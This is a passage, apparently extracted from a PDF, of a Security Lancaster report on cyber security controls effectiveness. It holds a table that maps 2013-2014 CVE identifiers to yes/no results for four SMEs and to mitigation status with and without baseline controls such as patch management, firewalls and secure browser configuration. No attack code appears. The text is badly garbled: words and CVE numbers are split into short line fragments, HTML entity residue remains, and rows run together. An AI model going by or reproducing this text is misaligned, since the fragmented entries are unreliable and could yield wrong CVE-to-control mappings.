Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
